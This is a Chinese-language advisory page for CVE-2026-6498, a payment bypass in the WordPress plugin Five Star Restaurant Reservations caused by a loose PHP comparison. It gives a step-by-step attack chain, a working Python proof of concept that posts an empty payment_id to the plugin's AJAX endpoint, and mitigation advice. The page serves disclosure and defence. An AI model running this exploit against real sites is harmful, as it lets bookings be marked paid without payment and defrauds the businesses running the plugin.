CVE-2026-6498 CVSS 5.3 中危

CVE-2026-6498 WordPress插件支付绕过漏洞

披露日期: 2026-04-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6498

漏洞类型

支付绕过

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WordPress Five Star Restaurant Reservations插件

漏洞概述

WordPress插件Five Star Restaurant Reservations在2.7.16及以下版本中存在支付绕过漏洞。由于valid_payment()函数使用了PHP弱类型比较（==），未经身份验证的攻击者可利用空字符串与null比较为真的特性，通过发送特定请求绕过Stripe支付验证，将待支付订单标记为已支付，导致业务损失。

技术细节

该漏洞源于插件对支付意图ID的验证逻辑存在缺陷。在Stripe支付流程中，若支付意图尚未创建，预订对象的stripe_payment_intent_id属性保持为null。插件使用PHP松散比较（==）来验证攻击者提供的POST参数payment_id与数据库中的stripe_payment_intent_id是否一致。当未经身份验证的攻击者向nopriv AJAX处理器rtb_stripe_pmt_succeed发送请求，并提交空的payment_id参数时，PHP会将sanitize_text_field('')处理为空字符串。在PHP弱类型比较中，空字符串''与null被认为是相等的（'' == null 返回TRUE）。因此，攻击者无需完成实际的Stripe支付即可通过验证，系统错误地将订单状态更新为已支付。

攻击链分析

STEP 1

侦察

攻击者识别目标网站正在使用Five Star Restaurant Reservations插件，且版本低于或等于2.7.16。

STEP 2

识别目标

攻击者获取或猜测一个有效的booking_id（通常预订ID是连续的整数）。

STEP 3

发送恶意请求

攻击者向/wp-admin/admin-ajax.php发送POST请求，action为rtb_stripe_pmt_succeed，并包含空的payment_id参数。

STEP 4

触发漏洞

服务器端PHP代码执行sanitize_text_field('') == null的比较，结果为TRUE，验证通过。

STEP 5

达成攻击

系统将对应的预订状态标记为已支付，攻击者无需实际付款。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_payment_bypass(target_url, booking_id):
    """
    PoC for CVE-2026-6498: Payment Bypass via PHP Type Juggling.
    """
    # The AJAX endpoint for WordPress
    ajax_url = f"{target_url}/wp-admin/admin-ajax.php"
    
    # Data payload exploiting the loose comparison
    payload = {
        "action": "rtb_stripe_pmt_succeed",
        "booking_id": booking_id,
        "payment_id": ""  # Empty string matches null in loose comparison
    }
    
    try:
        response = requests.post(ajax_url, data=payload)
        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response Body: {response.text}")
        if response.status_code == 200:
            print("[+] Request sent. Check booking status to verify exploitation.")
    except Exception as e:
        print(f"[-] Error: {e}")

# Example usage:
# exploit_payment_bypass("http://example.com", "123")

影响范围

Five Star Restaurant Reservations <= 2.7.16

防御指南

临时缓解措施

建议立即将插件升级到最新版本以修复此漏洞。如果暂时无法升级，应考虑禁用该插件的在线支付功能，并对后台订单进行人工审核，排查是否存在被恶意标记为已支付的异常订单。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表